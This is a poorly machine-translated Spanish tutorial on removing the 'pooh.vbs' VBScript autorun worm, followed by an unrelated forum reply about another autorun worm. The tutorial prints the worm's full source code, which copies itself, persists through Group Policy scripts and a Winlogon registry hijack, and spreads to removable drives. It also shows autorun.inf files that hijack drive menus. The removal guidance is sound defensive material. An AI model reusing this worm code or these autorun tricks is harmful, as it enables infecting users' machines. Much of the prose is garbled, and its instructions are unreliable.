Alguna vez has querido saber cómo todos esos virus se instalan en su sistema? Me pregunto por qué el sistema se inicia actuando de manera extraña , pero el AV no puede detectar nada? Siempre quise saber cómo se siente al cazar un virus es dueño de su propio en el vasto desierto de su propia PC ? Con este tutorial puedes probarlo.Este tutorial es acerca de los scripts (VBS) de virus , la identificación de ellos , contradiciendo y eliminarlos manualmente si el AV no puede identificarlos. Consejos sobre cómo mantener su sistema se infecte de ellos también serán discutidos aquí .Acerca de virus scripts VBS :Este tipo de archivos son sólo archivos de comandos regulares. Pueden contener cualquier cosa, desde los scripts útiles sutiles códigos corruptoras del sistema. Pequeño como estos scripts pueden ser, con malas intenciones del autor , son tan capaces de causar estragos como cualquier otro virus. Al ser archivos de script , tienen la ligera ventaja de no ser identificado por la mayoría de AV (excepto , por supuesto, si el archivo de secuencia de comandos contiene partes de código que AVs todavía lo usan para identificarlos como los virus. ) Ante este hecho es por eso que una gran cantidad de estos scripts son extendido por todas partes.Métodos de propagación :El método principal de estas secuencias de comandos para la difusión está utilizando las funciones de ejecución automática del sistema de Windows. Con este método se propagan usando dispositivos de memoria externos, incluyendo pero no limitado a memorias USB y tarjetas de memoria , como portadores . Con el gran porcentaje de los usuarios de Windows no saber cómo la función de ejecución automática puede ser un riesgo, la seguridad , no es de extrañar cómo estos scripts se pueden propagar libremente con muy poco de moderación .Cómo protegerse :Para protegerse , usted puede tomar las siguientes medidas :1 . Desactivación de la función de ejecución automática.2 . Aprende a acceder a las unidades haciendo clic derecho en el icono del disco y elegir Abrir en lugar de hacer doble clic.3 . En lugar del punto 2 , Aprende a acceder a las unidades escribiendo la letra de unidad en la barra de direcciones y pulsa enter.* Se explicará en la sección Scripts Virus Contrarrestar

(Consejos de protección 1 y 2 créditos van a Mojica, que me dio DarKristal )

Para desactivar la función de ejecución automática , siga estos pasos .1 . Vaya a Inicio > Ejecutar, escriba " gpedit.msc " sin las comillas y presiona Enter.2 . Lo que se busca son las siguientes

Tanto el de la "Vuelta de Autoplay" debe ser "activado" como en los casquillos de la pantalla, así como la opción "Otra vuelta de Reproducción automática en" bajo la pestaña Configuración para establecer en "todas las unidades".

Lucha contra Virus Scripts:Lo Primero que nada es para detener las instancias de la escritura de virus ( s ) que se ejecutan en segundo plano . Vamos a hacer un poco de matanza Manual de algunos procesos con el administrador de tareas . Para acceder al administrador de tareas puede hacer clic derecho la barra de tareas y seleccione " Administrador de tareas " o puede pulsar el buen viejo Ctrl + Alt + Supr combinación de teclas . Lo que estamos buscando es en realidad el programa que ejecuta los scripts de virus y por desgracia en este caso es un componente de Windows , es decir, " wscript.exe " . Si encuentra wscript ejecuta en segundo plano y sin su conocimiento lo más probable es que usted está infectado con un virus de la escritura. Simplemente elimine todas las instancias de wscript ( si hay más de uno se está ejecutando ) . Después de esto podemos proceder a las partes buenas.Obtenga sus cuchillos quirúrgicos yerran ... teclados listos . Es hora de diseccionar un script virus. Para esta sección vamos a utilizar este script actual virus que se conoce con el nombre de archivo " pooh.vbs ", también conocido como " Aikelyu " ( que te mate ) . Al igual que su nombre, se trata de una secuencia de comandos en lugar de virus inofensivos, pero una molestia, no obstante. Si usted está infectado con él, cada vez que usted inicia la sesión, un archivo html con el mensaje " ' Jayker ' PogitosGwaposAmigosGarantisadosGalantis Kaayos ! ", Que de acuerdo con quien hizo ESS , palabra por palabra se traduce como " <creators handle> HandsomeHandsomeFriendsGuaranteedGallant Muy !" No es que tenemos que saber lo que significa.

Lo que lo hace un buen ejemplo es que tiene todas las características de un virus típico. Replicación, al hacer copias de seguridad ocultos de sí mismo, edita el registro y asegurarse de que infecta todos los dispositivos de memoria externa que se conecta a la máquina mientras se está ejecutando y una carga útil de mostrar un mensaje extraño en un html a cada inicio de sesión. Esto es seguro para mantenerte ocupado durante unos minutos.Antes de continuar, por si acaso usted es un novato probar esta disección de la escritura, es mejor tener una cura segura a la mano. Aunque este script virus ahora puede ser detectado por la mayoría de AV como el virus VBS / AutoRun.G , la mayoría de AV no restauran el registro cambia el guión hace . Sólo una medida de seguridad en caso de que accidentalmente infectarse con pooh.vbs . Descargue e instale ESS desde este sitio. Es un pequeño proyecto Anti Virus hecho especialmente para los scripts de virus ( pooh.vbs incluidos) . Puede obtener más información acerca de ESS desde el lugar de la persona que hizo el mini- AV.Antes de continuar con el plato principal vamos a echar un vistazo a su cómplice en el archivo " autorun.inf" . El archivo autorun es un archivo que contiene información sobre lo que se supone que debe funcionar de forma automática y alguna otra información adicional, como la imagen del icono de la unidad se supone que utiliza y otras cosas.Para nuestro script virus bah esto es lo que está contenido en ella de autorun.inf[autorun ]pooh.vbs shellexecute = wscript.exeDos líneas simples llenas de malas intenciones . En un equipo en el que está habilitada la ejecución automática , el segundo que el sistema haya terminado de cargar controladores para los medios de comunicación que contiene el virus , el script se ejecuta automáticamente en segundo plano ,

lo que permite a copiarse a sí mismo a sus escondites predeterminados y la otra maldad que trae. Clever sí, pero no tan inteligente como este otro ejemplo de ejecución automática de otro virus .[autorun ]= abierto

shell \ open \ command = RECYCLER \ info.exeshell \ open \ Default = 1shell \ explore \ Command = RECYCLER \ info.exeNote "shell \ open \ Command =" y " shell \ explore \ Command ="? ¿Qué los hace? Oh, nada realmente. Sólo se secuestra el Abierto y Explorar en el menú emergente cuando damos click derecho en el icono de la unidad, lo que permite que el programa se ejecute incluso si elegimos Abrir o Explorar en el menú emergente. Eh Nasty ? Funciona incluso si la Reproducción automática ya está desactivada. Por eso le di el consejo número tres en la sección de protección de sí mismo, para acceder a una unidad, escriba la letra de unidad en la barra de direcciones y pulsar enter en vez de la punta # 2 . Nunca podemos estar seguros en estos días.Esto en cuanto a los archivos del autorun, en que la disección de Pooh . Uno no tiene que saber VBS codificación conocer el interior de este bebé. Sólo tienes que por lo menos ser capaz de reconocer las ubicaciones de archivos y entradas del registro. A continuación se muestra el código completo dentro pooh.vbs

'Ngaran Ko Aikelyu! Bulos Waray Waray!!!on error resume nextdim mysourcedim pathdim fdrivedim fs dim pf dim infdrivedim bfdim rgdim ntdim sddim checkdim msgnpdim inigpfolder_pdim inigpfolder_tdim text,sizeinfdrive = "[autorun]"&vbcrlf&"shellexecute=wscript.exe pooh.vbs"msgnp = "<html>"&vbcrlf&"<head></head>"&vbcrlf&"<title>Aikelyu</title>"&vbcrlf&"<body bgcolor=black>"&vbcrlf&"<font color=red size=+5>"&vbcrlf&"<center>"&vbcrlf&"<b>"&vbcrlf&"<aikelyu>'Jayker' PogitosGwaposAmigosGarantisadosGalantis Kaayos!!</aikelyu>"&vbcrlf&"</b>"&vbcrlf&"</center>"&vbcrlf&"</font>"&vbcrlf&"</body>"&vbcrlf&"</html>"inigpfolder_p = ""&vbcrlf&"[Startup]"&vbcrlf&"0CmdLine=pooh.vbs"&vbcrlf&"0Parameters="&vbcrlf&"[Shutdown]"&vbcrlf&"0CmdLine=pooh.vbs"&vbcrlf&"0Parameters="inigpfolder_t = ""&vbcrlf&"[Logon]"&vbcrlf&"0CmdLine=pooh.vbs"&vbcrlf&"0Parameters="&vbcrlf&"[Logoff]"&vbcrlf&"0CmdLine=pooh.vbs"&vbcrlf&"0Parameters="set fs = createobject("Scripting.FileSystemObject")set pf = fs.getfile(Wscript.ScriptFullname)set text=pf.openastextstream(1,-2)

size = pf.sizecheck = pf.drive.drivetypedo while not text.atendofstreammysource=mysource&text.readlinemysource=mysource & vbcrlfloopdoSet path = fs.getspecialfolder(0)

set bf = fs.getfile(path &"\pooh.vbs")bf.attributes = 32set bf=fs.createtextfile(path &"\system32\kernel.dll.vbs",2,true)bf.write mysourceset bf=fs.getfile(path &"\system32\kernel.dll.vbs")bf.attributes = 39bf.close

'Startupset bf=fs.getfile(path &"\system32\GroupPolicy\Machine\Scripts\Startup\pooh.vbs")bf.attributes = 32set bf=fs.createtextfile(path &"\system32\GroupPolicy\Machine\Scripts\Startup\pooh.vbs",2,true)bf.write mysourceset bf=fs.getfile(path &"\system32\GroupPolicy\Machine\Scripts\Startup\pooh.vbs")bf.attributes = 39bf.close

'Shutdownset bf=fs.getfile(path &"\system32\GroupPolicy\Machine\Scripts\Shutdown\pooh.vbs")bf.attributes = 32set bf=fs.createtextfile(path &"\system32\GroupPolicy\Machine\Scripts\Shutdown\pooh.vbs",2,true)bf.write mysourceset bf=fs.getfile(path &"\system32\GroupPolicy\Machine\Scripts\Shutdown\pooh.vbs")bf.attributes = 39bf.close

'Logonset bf=fs.getfile(path &"\system32\GroupPolicy\User\Scripts\Logon\pooh.vbs")bf.attributes = 32set bf=fs.createtextfile(path &"\system32\GroupPolicy\User\Scripts\Logon\pooh.vbs",2,true)bf.write mysourceset bf=fs.getfile(path &"\system32\GroupPolicy\User\Scripts\Logon\pooh.vbs")bf.attributes = 39bf.close

'Logoffset bf=fs.getfile(path &"\system32\GroupPolicy\User\Scripts\Logoff\pooh.vbs")bf.attributes = 32set bf=fs.createtextfile(path &"\system32\GroupPolicy\User\Scripts\Logoff\pooh.vbs",2,true)bf.write mysourceset bf=fs.getfile(path &"\system32\GroupPolicy\User\Scripts\Logoff\pooh.vbs")bf.attributes = 39bf.close

>set bf=fs.getfile(path &"\system32\aikelyu.html")bf.attributes = 32set bf=fs.createtextfile(path &"\system32\aikelyu.html",2,true)bf.write msgnpset bf=fs.getfile(path &"\system32\aikelyu.html")bf.attributes = 39bf.close

set bf=fs.getfile(path &"\system32\GroupPolicy\Machine\Scripts\scripts.ini")bf.attributes=32set bf=fs.createtextfile(path &"\system32\GroupPolicy\Machine\Scripts\scripts.ini",2,true)bf.write inigpfolder_pset bf=fs.getfile(path &"\system32\GroupPolicy\Machine\Scripts\scripts.ini")bf.attributes=39bf.close

set bf=fs.getfile(path &"\system32\GroupPolicy\User\Scripts\scripts.ini")bf.attributes=32set bf=fs.createtextfile(path &"\system32\GroupPolicy\User\Scripts\scripts.ini",2,true)bf.write inigpfolder_tset bf=fs.getfile(path &"\system32\GroupPolicy\User\Scripts\scripts.ini")bf.attributes=39bf.close

set bf=fs.getfile(path &"\Debug\pooh.vbs")bf.attributes=32set bf=fs.createtextfile(path &"\Debug\pooh.vbs",2,true)bf.write mysourceset bf=fs.getfile(path &"\Debug\pooh.vbs")bf.attributes=39bf.close

for each fdrive in fs.drivesIf (fdrive.drivetype = 1 or fdrive.drivetype = 2) and fdrive.path <> "A:" thenset bf=fs.getfile(fdrive.path &"\pooh.vbs")bf.attributes = 32set bf=fs.createtextfile(fdrive.path &"\pooh.vbs",2,true)bf.write mysourceset bf=fs.getfile(fdrive.path &"\pooh.vbs")bf.attributes = 39bf.close

set bf =fs.getfile(fdrive.path &"\autorun.inf")bf.attributes=32set bf=fs.createtextfile(fdrive.path &"\autorun.inf",2,true)bf.write infdriveset bf =fs.getfile(fdrive.path &"\autorun.inf")bf.attributes=39bf.close

end ifnext

set rg = createobject("WScript.Shell")rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Aikelyu",path&"\system32\aikelyu.html"rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","Explorer.exe "&path&"\system32\kernel.dll.vbs"if check <> 1 thenWscript.sleep 20000end ifloop while check<>1

set sd = createobject("Wscript.shell")sd.run path&"\system32\aikelyu.html /e,/select, "&Wscript.ScriptFullname

Lo que buscamos aquí es encontrar las maneras de contrarrestar y eliminar los efectos de la escritura de virus, por lo que puede relajarse y no prestar demasiada atención a todo el código confuso. Lo que vamos a buscar primero es donde el esconde copias de sí mismo y lo que esconden bajo los nombres. Este archivo es un VBScript que puede limitar la búsqueda a la búsqueda de cadenas que tienen vbs mencionan en ellos como . :

conjunto bf = fs.getfile (path & " \ system32 \ kernel.dll.vbs ")conjunto bf = fs.getfile (path & " \ system32 \ GroupPolicy \ Machine \ Scripts \ Startup \ pooh.vbs " ) yconjunto bf = fs.getfile (path & " \ system32 \ GroupPolicy \ Machine \ Scripts \ Shutdown \ pooh.vbs ")

Los siguientes son ejemplos de los lugares donde Pooh esconde una copia de sí mismo . La " trayectoria y " representa el directorio en el que instaló su sistema operativo . Suponiendo , para este ejemplo el sistema operativo se encuentra en C : \ WINDOWS entonces, trayectoria y "\ system32 \ kernel.dll.vbs " significa C: \ Windows \ system32 \ kernel.dll.vbs .trayectoria y "\ system32 \ GroupPolicy \ Usuario \ Scripts \ cierre de sesión \ scripts.ini ") < == ese trozo de código significa que está ubicado en la que instaló su sistema operativo ex C : . \ windows \ system32 \ GroupPolicy \ usuario \ Scripts \ Cierre de sesiónTambién explorar el resto del archivo de comandos para ver todos los archivos que se generan a partir de la secuencia de comandos , como los archivos . Ini y el archivo html . Para se pone el elemento emergente de inicio de sesión pulg Mejores tomar notas de todos los archivos que usted ve y sus ubicaciones . Usted va a necesitar para después.Siguiente en la lista es la búsqueda de las claves de registro que el virus agrega y o

modificaciones en el registro. Afortunadamente Pooh sólo puso dos cambios en el registro:rg.regwrite"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Aikelyu",path&"\system32\aikelyu.html"rg.regwrite"HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ Shell" ," Explorer.exe " & ruta & " \ system32 \ kernel.dll.vbs "Lo que la primera entrada del registro que hace es inserta un valor de cadena bajo[ HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run ] que hace que el archivo html molesto, a saber, " aikelyu.html " pop-up cada inicio de sesión . La segunda entrada del registro se cambia el valor original[ HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon ]"Shell " = " Explorer.exe " a " Explorer.exe C: \ WINDOWS \ system32 \ kernel.dll.vbs " . Esto asegura que una instancia de Pooh es runring cuando se carga el explorador.Eso es bastante mucho al respecto. Todo lo que necesitas saber son los archivos que genera, en los que están ocultos, compruebe la configuración de registro que cambia y que es casi todo lo que hay que hacer. Puede hacer caso omiso de las otras partes, ya que son útiles para el propio guión y no será de mucha utilidad para usted. Cuando esté seguro de que haya una lista de los archivos que genera y también sabe los valores que ha añadido / cambiado usted puede probar la cura del Registro.La cura:Usted está bastante seguro de que no ha perdido nada y están dispuestos a matar a la secuencia de comandos de forma permanente. Asumiendo que estamos después pooh.vbs , este es el momento para pasar a la etapa de safari de caza . Para empezar las cosas, asegúrese de matar a todos los casos de ejecución de scripts desde el fondo. Luego, con la lista que ha generado a partir de las notas que se reunieron a partir de la secuencia de comandos virus diana, cazar las copias ocultas de la escritura de virus y otros archivos que generó alrededor de todos los lugares que usted ha enumerado abajo. Eliminación de ellos no es que gran parte de un problema, ya que sólo puede borrarlos incluso si son menores atributos de archivo del sistema.* Para obtener los mejores resultados, es mejor si se establece el sistema para mostrar los archivos ocultos y de sistema, ya que algunos de los archivos que está buscando son la mayor parte del tiempo bajo los atributos de los archivos del sistema y pueden no ser visibles.Después de haber cazado hasta la última copia de la escritura de virus y todos los demás archivos que generó, es el momento de continuar con el registro. En el editor de registro vaya a donde las teclas añadido / cambiado por el script es y eliminar / restaurar. Para abrir el registro sólo tiene que ir a Inicio> Ejecutar tipo "regedit " y presionar enter."HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Aikelyu",path&"\system32\aikelyu.html"rg.regwrite "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ Shell ", " Explorer.exe " & ruta & " \ system32 \ kernel.dll.vbs "¿Qué se puede hacer con esas entradas es borrar el primero y restaurar el segundo a su valor original . (Si no tiene experiencia en la edición del registro le sugiero que ejecute ESS para

restaurar los valores automáticamente.Fin :Eso lo resume todo. Para todos los novatos que trataron este tutorial cabo acabas matado su primer script virus. Felicitaciones. Algunos encuentran esta actividad agradable y un poco adictivo , matando a todos los scripts , convirtiendo sus entrañas . Una buena experiencia para todos con seguridad.- ID10t.Daemon

CréditosMojica de HMU por su vasto conocimiento. Puede que no sea capaz de hablar mucho con él, pero sus mensajes en los foros son como el oro.DarKristal y todos los miembros del equipo Freelance para empezar me fuera en esta locura de la caza del virus VBS .Francis el Autor de Soluciones Emergencia Seguridad y el que inició la locura de la caza en equipo Freelance .

Bueno te paso el procedimiento exacto de como eliminarlo manualmente.

Si tenes Windows XP o ME desactiva "Restaurar Sistema" (esto es vital). Primero terminar el programa del malwere. 1- Abrir el Administrador de Tareas de Windows. • En Windows 98 y ME, pulse CTRL + ALT + SUPR • En Windows NT, 2000 2003, pulse CTRL + SHIFT + ESC, a continuación, haga clic en la pestaña Procesos. 2- En la lista de programas en ejecución, localizar el proceso: WScript.exe 3- Seleccione el programa malicioso, a continuación, pulse Finalizar tarea ni a la o el botón Finalizar tarea, en función de la versión de Windows en su ordenador. 4- Para comprobar que el proceso haya terminado, cierre el Administrador de tareas y, a continuación, lo vuelve a abrir. 5- Cerrar el Administrador de tareas.

Segundo eliminar los autostart del registro 1- Abrir el editor de registro. Haga clic en Inicio> Ejecutar, escriba REGEDIT, y luego pulse Enter. 2- En el panel de la izquierda, haga doble clic en el siguiente: HKEY_LOCAL_MACHINE> Software> Microsoft> Windows> CurrentVersion> Policies> Explorer> Run 3- En el panel derecho, localizar y borrar la entrada: Explorer = ". Vbs" 4-Cerrar el Editor de Registro.

Tercero eliminar el Malware de archivo 1- Haga clic derecho en "Inicio" y después haga clic en Buscar. 2- En el cuadro de entrada, escriba: % System% \. Pif (98 2000, o C: \ Windows \ System32 en Windows XP y Server 2003.) 3-En Buscar en la lista desplegable, seleccione la unidad que contiene Windows, pulse Entrar. 4-Una vez localizado, seleccione el archivo y luego presione SHIFT + SUPR. 5-Repita los pasos 2-4 para el siguiente archivo (s): % System% \. Uce

Cuarto eliminar los AUTORUN.INF que crea el Malware. 1-Haga clic derecho en "Inicio" y después haga clic en Buscar 2- En el cuadro de entrada, escriba: AUTORUN.INF 3- En Buscar en la lista desplegable, selecciona una unidad, a continuación, pulse Intro. 4- Seleccione el archivo, luego abrir usando el Bloc de Notas. 5- Compruebe si las siguientes líneas están presentes en el archivo: Cita:Forgiveme [Autorun] Abierto = wscript.exe information.vbs Shell \ open \ Command = wscript.exe information.vbs Shell \ encontrar \ Command = wscript.exe information.vbs Shell \ open \ default = 1

6- Si las líneas están presentes, elimine el archivo. 7- Repita los pasos 3 a 6 para los archivos AUTORUN.INF en el resto de unidades extraíbles. Cerrar los resultados de la búsqueda

Listo con eso vas a eliminar completamente a ese virus. Si queres realiza un escaneo en modo seguro por las dudas pero no creo q sea necesario, pero asi te agarras por si tenes otra cosa. Suerte espero haberte ayudado.